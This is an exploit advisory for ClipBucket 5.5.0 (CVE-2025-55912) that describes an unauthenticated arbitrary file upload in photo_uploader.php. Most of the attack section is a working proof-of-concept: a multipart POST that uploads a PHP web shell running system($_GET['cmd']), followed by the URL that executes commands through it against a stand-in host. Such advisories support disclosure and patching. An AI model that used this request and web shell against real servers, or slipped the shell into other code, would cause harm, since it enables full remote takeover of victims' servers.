# Exploit Title: ClipBucket 5.5.0 - Arbitrary File Upload
# Google Dork: N/A
# Date: 2025-09-11
# Exploit Author: Mukundsinh Solanki (r00td3str0y3r)
# Vendor Homepage: https://clipbucket.com
# Software Link: https://github.com/MacWarrior/clipbucket-v5
# Version: <= 5.5.0
# Tested on: Ubuntu 20.04 LTS, PHP 7.4
# CVE: CVE-2025-55912
## Vulnerability Description:
ClipBucket <= 5.5.0 suffers from an unauthenticated arbitrary file upload
vulnerability in `upload/actions/photo_uploader.php`. Missing access
controls and insufficient validation of uploaded files allow an attacker to
upload a crafted PHP file and execute it remotely, leading to full remote
code execution (RCE).
## PoC Request:
POST /upload/actions/photo_uploader.php HTTP/1.1
Host: victim.com
Content-Type: multipart/form-data; boundary=----BOUND
------BOUND
Content-Disposition: form-data; name="Filedata"; filename="shell.php"
Content-Type: application/x-php
<?php system($_GET['cmd']); ?>
------BOUND--
The file is uploaded without authentication. The attacker can then access
it:
http://victim.com/files/photos/shell.php?cmd=id
## Impact:
- Unauthenticated remote code execution (RCE)
- Full compromise of target application and underlying server
Regards,
Mukundsinh Solanki
+916355251151